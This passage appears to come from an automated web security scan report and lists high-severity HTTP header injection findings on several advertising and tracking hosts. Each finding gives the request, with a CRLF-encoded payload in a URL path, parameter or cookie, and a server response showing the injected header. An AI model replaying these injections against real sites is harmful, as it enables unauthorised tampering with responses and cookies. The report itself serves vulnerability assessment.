GET /redirect?RL_rurl=http://utdi.reachlocal.com/coupon/&RL_qstr=d0f4f%0d%0a6e008c98e33&RL_ckstr=RlocalUID%3Dscid%253D2323693%2526cid%253D837045%2526tc%253D11090604520111271%2526kw%253D233292%3BRlocalHilite%3Dkw_hilite_off%253D0%2526se_refer%253Dhttp%25253A%25252F%25252Fwww.google.com%25252Fsearch%25253Fsourceid%25253Dchrome%252526ie%25253DUTF-8%252526q%25253Dtelephone%25252Bservice%3BRlocalTiming%3Dlanding_loadtime_off%253D0%2526retarget_off%253D0 HTTP/1.1
Host: redirect.rtrk.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=telephone+service
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 11:52:47 GMT
Server: Apache
Set-Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292; domain=.rtrk.com; path=/
Set-Cookie: RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; domain=.rtrk.com; path=/
Set-Cookie: RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0; domain=.rtrk.com; path=/
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Location: http://utdi.reachlocal.com/coupon/?d0f4f
6e008c98e33

Vary: Accept-Encoding
Content-Length: 304
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_wt-vtb-susl-iuuq=ffffffff096d1b7f45525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:17:40 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://utdi.reachlocal.com/coupon/?d0f4f
6e008
...[SNIP]...

1.6. http://redirect.rtrk.com/redirect [RL_rurl parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://redirect.rtrk.com
Path:   /redirect

Issue detail

The value of the RL_rurl request parameter is copied into the Location response header. The payload b10dd%0d%0a3788128dbfd was submitted in the RL_rurl parameter. This caused a response containing an injected HTTP header.

Request

GET /redirect?RL_rurl=b10dd%0d%0a3788128dbfd&RL_qstr=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26rl_key%3De2e30c5686d91c3f4971163361e1b86a%26kw%3D233292%26dynamic_proxy%3D1%26primary_serv%3Dutdi.reachlocal.net%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice%26pub_cr_id%3D8668759748&RL_ckstr=RlocalUID%3Dscid%253D2323693%2526cid%253D837045%2526tc%253D11090604520111271%2526kw%253D233292%3BRlocalHilite%3Dkw_hilite_off%253D0%2526se_refer%253Dhttp%25253A%25252F%25252Fwww.google.com%25252Fsearch%25253Fsourceid%25253Dchrome%252526ie%25253DUTF-8%252526q%25253Dtelephone%25252Bservice%3BRlocalTiming%3Dlanding_loadtime_off%253D0%2526retarget_off%253D0 HTTP/1.1
Host: redirect.rtrk.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=telephone+service
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 11:52:37 GMT
Server: Apache
Set-Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292; domain=.rtrk.com; path=/
Set-Cookie: RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; domain=.rtrk.com; path=/
Set-Cookie: RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0; domain=.rtrk.com; path=/
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Location: b10dd
3788128dbfd
?scid=2323693&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748
Vary: Accept-Encoding
Content-Length: 571
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_wt-vtb-susl-iuuq=ffffffff096d1b7f45525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:17:29 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="b10dd
3788128dbfd?scid=2323693&amp;cid=837045&
...[SNIP]...

1.7. http://udmserve.net/udm/img.fetch [dt cookie]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://udmserve.net
Path:   /udm/img.fetch

Issue detail

The value of the dt cookie is copied into the Set-Cookie response header. The payload 6ab88%0d%0a0adc77508cd was submitted in the dt cookie. This caused a response containing an injected HTTP header.

Request

GET /udm/img.fetch?sid=2900;tid=1;ev=1;dt=1; HTTP/1.1
Host: udmserve.net
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/ober.frontier/product_119282623;dc_seed=;tile=4;sz=728x90;ord=278143426403403.28?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: udm1=9173:1:63440343934:1:2900:0:0:63440343934:1:1|; dt=6ab88%0d%0a0adc77508cd; __qca=P0-679846959-1315331134624

Response

HTTP/1.1 200 OK
P3P: CP='NOI DSP CURa ADMa DEVa PSAa PSDa OUR IND UNI COM NAV INT'
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP CURa ADMa DEVa PSAa PSDa OUR IND UNI COM NAV INT"
Set-Cookie: udm1=9173:1:63440344253:14:2900:0:0:63440344253:1:1|; domain=udmserve.net; path=/; expires=Wed, 05-Sep-2012 12:50:53 GMT
Set-Cookie: dt=6ab88
0adc77508cd
; domain=udmserve.net; path=/; expires=Wed, 05-Sep-2012 12: 50:53 GMT
Expires: Mon, 05 Sep 2011 12:50:53 GMT
Date: Tue, 06 Sep 2011 12:50:53 GMT
Content-Type: text/html; charset=ISO-8859-1
Server: lighttpd/1.4.28
Content-Length: 1337

<!DOCTYPE html
   PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en-US" xml:lang="en-US">
<
...[SNIP]...

1.8. http://utdi.reachlocal.net/images/Bottom_facebook.jpg [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://utdi.reachlocal.net
Path:   /images/Bottom_facebook.jpg

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 2516f%0d%0a0b50936584 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /2516f%0d%0a0b50936584/Bottom_facebook.jpg HTTP/1.1
Host: utdi.reachlocal.net
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.net/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292%26clk%3D1315309925%26dynamic_proxy%3D1%26primary_serv%3Dutdi.reachlocal.net; RlocalPROXY=RLPROXY%3D; RlocalPROXYLog=RLPROXYLog%3d0; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0%26track_landing_pages%3D1

Response

HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 11:53:20 GMT
Server: Apache
Location: http://utdi.com/2516f
0b50936584
/Bottom_facebook.jpg
Vary: Accept-Encoding
Content-Length: 306
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7c45525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:18:13 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://utdi.com/2516f
0b50936584/Bottom_facebo
...[SNIP]...

1.9. http://utdi.reachlocal.net/images/Rsidepanel_CSportalHead.jpg [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://utdi.reachlocal.net
Path:   /images/Rsidepanel_CSportalHead.jpg

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 54340%0d%0a57bb639a64e was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /54340%0d%0a57bb639a64e/Rsidepanel_CSportalHead.jpg HTTP/1.1
Host: utdi.reachlocal.net
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.net/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292%26clk%3D1315309925%26dynamic_proxy%3D1%26primary_serv%3Dutdi.reachlocal.net; RlocalPROXY=RLPROXY%3D; RlocalPROXYLog=RLPROXYLog%3d0; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0%26track_landing_pages%3D1

Response

HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 11:52:50 GMT
Server: Apache
Location: http://utdi.com/54340
57bb639a64e
/Rsidepanel_CSportalHead.jpg
Vary: Accept-Encoding
Content-Length: 315
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7845525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:17:42 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://utdi.com/54340
57bb639a64e/Rsidepanel_C
...[SNIP]...

1.10. http://utdi.reachlocal.net/images/Rsidepanel_ID-contact.jpg [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://utdi.reachlocal.net
Path:   /images/Rsidepanel_ID-contact.jpg

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload ae4cb%0d%0a0096e3364fc was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /imagesae4cb%0d%0a0096e3364fc/Rsidepanel_ID-contact.jpg HTTP/1.1
Host: utdi.reachlocal.net
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.net/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292%26clk%3D1315309925%26dynamic_proxy%3D1%26primary_serv%3Dutdi.reachlocal.net; RlocalPROXY=RLPROXY%3D; RlocalPROXYLog=RLPROXYLog%3d0; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0%26track_landing_pages%3D1

Response

HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 11:53:02 GMT
Server: Apache
Location: http://utdi.com/imagesae4cb
0096e3364fc
/Rsidepanel_ID-contact.jpg
Vary: Accept-Encoding
Content-Length: 319
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7c45525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:17:55 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://utdi.com/imagesae4cb
0096e3364fc/Rsidep
...[SNIP]...

1.11. http://utdi.reachlocal.net/images/Rsidepanel_ID-pr.jpg [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://utdi.reachlocal.net
Path:   /images/Rsidepanel_ID-pr.jpg

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 3eb55%0d%0aefef98aca08 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /images3eb55%0d%0aefef98aca08/Rsidepanel_ID-pr.jpg HTTP/1.1
Host: utdi.reachlocal.net
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.net/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292%26clk%3D1315309925%26dynamic_proxy%3D1%26primary_serv%3Dutdi.reachlocal.net; RlocalPROXY=RLPROXY%3D; RlocalPROXYLog=RLPROXYLog%3d0; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0%26track_landing_pages%3D1

Response

HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 11:53:02 GMT
Server: Apache
Location: http://utdi.com/images3eb55
efef98aca08
/Rsidepanel_ID-pr.jpg
Vary: Accept-Encoding
Content-Length: 314
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7945525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:17:54 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://utdi.com/images3eb55
efef98aca08/Rsidep
...[SNIP]...

1.12. http://utdi.reachlocal.net/images/Rsidepanel_ID-specials.jpg [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://utdi.reachlocal.net
Path:   /images/Rsidepanel_ID-specials.jpg

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload cbce7%0d%0a95d968751a4 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /cbce7%0d%0a95d968751a4/Rsidepanel_ID-specials.jpg HTTP/1.1
Host: utdi.reachlocal.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.net/index.html?scid=2323693&cid=e78be
Cookie: RlocalUID=tc%3D11090605095230846; NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7445525d5f4f58455e445a4a423660

Response

HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 12:10:23 GMT
Server: Apache
Location: http://utdi.com/cbce7
95d968751a4
/Rsidepanel_ID-specials.jpg
Vary: Accept-Encoding
Content-Length: 314
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7445525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:35:15 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://utdi.com/cbce7
95d968751a4/Rsidepanel_I
...[SNIP]...

1.13. http://utdi.reachlocal.net/images/Rsidepanel_UTDI-G.jpg [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://utdi.reachlocal.net
Path:   /images/Rsidepanel_UTDI-G.jpg

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload ca126%0d%0a0d553889d45 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /ca126%0d%0a0d553889d45/Rsidepanel_UTDI-G.jpg HTTP/1.1
Host: utdi.reachlocal.net
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.net/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292%26clk%3D1315309925%26dynamic_proxy%3D1%26primary_serv%3Dutdi.reachlocal.net; RlocalPROXY=RLPROXY%3D; RlocalPROXYLog=RLPROXYLog%3d0; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0%26track_landing_pages%3D1

Response

HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 11:53:02 GMT
Server: Apache
Location: http://utdi.com/ca126
0d553889d45
/Rsidepanel_UTDI-G.jpg
Vary: Accept-Encoding
Content-Length: 309
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7945525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:17:55 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://utdi.com/ca126
0d553889d45/Rsidepanel_U
...[SNIP]...

1.14. http://utdi.reachlocal.net/images/Rsidepanel_UTDiStore.jpg [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://utdi.reachlocal.net
Path:   /images/Rsidepanel_UTDiStore.jpg

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 36ce5%0d%0aa169a199146 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /36ce5%0d%0aa169a199146/Rsidepanel_UTDiStore.jpg HTTP/1.1
Host: utdi.reachlocal.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.net/index.html?scid=2323693&cid=e78be
Cookie: RlocalUID=tc%3D11090605095230846; NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7445525d5f4f58455e445a4a423660

Response

HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 12:10:23 GMT
Server: Apache
Location: http://utdi.com/36ce5
a169a199146
/Rsidepanel_UTDiStore.jpg
Vary: Accept-Encoding
Content-Length: 312
Content-Type: text/html; charset=iso-8859-1
X-Pad: avoid browser bug
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7445525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:35:15 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://utdi.com/36ce5
a169a199146/Rsidepanel_U
...[SNIP]...

1.15. http://utdi.reachlocal.net/images/Rsidepanel_btm.jpg [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://utdi.reachlocal.net
Path:   /images/Rsidepanel_btm.jpg

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 8ea78%0d%0a6eb580edc8f was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /8ea78%0d%0a6eb580edc8f/Rsidepanel_btm.jpg HTTP/1.1
Host: utdi.reachlocal.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.net/index.html?scid=2323693&cid=e78be
Cookie: RlocalUID=tc%3D11090605095230846; NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7445525d5f4f58455e445a4a423660

Response

HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 12:10:28 GMT
Server: Apache
Location: http://utdi.com/8ea78
6eb580edc8f
/Rsidepanel_btm.jpg
Vary: Accept-Encoding
Content-Length: 306
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7445525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:35:21 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://utdi.com/8ea78
6eb580edc8f/Rsidepanel_b
...[SNIP]...

1.16. http://utdi.reachlocal.net/images/Rsidepanel_mid-specials.jpg [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://utdi.reachlocal.net
Path:   /images/Rsidepanel_mid-specials.jpg

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload fa623%0d%0a91d1427d552 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /fa623%0d%0a91d1427d552/Rsidepanel_mid-specials.jpg HTTP/1.1
Host: utdi.reachlocal.net
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.net/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292%26clk%3D1315309925%26dynamic_proxy%3D1%26primary_serv%3Dutdi.reachlocal.net; RlocalPROXY=RLPROXY%3D; RlocalPROXYLog=RLPROXYLog%3d0; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0%26track_landing_pages%3D1

Response

HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 11:53:02 GMT
Server: Apache
Location: http://utdi.com/fa623
91d1427d552
/Rsidepanel_mid-specials.jpg
Vary: Accept-Encoding
Content-Length: 315
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7945525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:17:54 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://utdi.com/fa623
91d1427d552/Rsidepanel_m
...[SNIP]...

1.17. http://utdi.reachlocal.net/images/Rsidepanel_mid.jpg [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://utdi.reachlocal.net
Path:   /images/Rsidepanel_mid.jpg

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 7cffb%0d%0ae67eb0e78d0 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /7cffb%0d%0ae67eb0e78d0/Rsidepanel_mid.jpg HTTP/1.1
Host: utdi.reachlocal.net
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.net/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292%26clk%3D1315309925%26dynamic_proxy%3D1%26primary_serv%3Dutdi.reachlocal.net; RlocalPROXY=RLPROXY%3D; RlocalPROXYLog=RLPROXYLog%3d0; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0%26track_landing_pages%3D1

Response

HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 11:53:23 GMT
Server: Apache
Location: http://utdi.com/7cffb
e67eb0e78d0
/Rsidepanel_mid.jpg
Vary: Accept-Encoding
Content-Length: 306
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7945525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:18:15 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://utdi.com/7cffb
e67eb0e78d0/Rsidepanel_m
...[SNIP]...

1.18. http://utdi.reachlocal.net/images/back-front.jpg [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://utdi.reachlocal.net
Path:   /images/back-front.jpg

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 3d3b2%0d%0a658a9609ca0 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /3d3b2%0d%0a658a9609ca0/back-front.jpg HTTP/1.1
Host: utdi.reachlocal.net
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.net/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
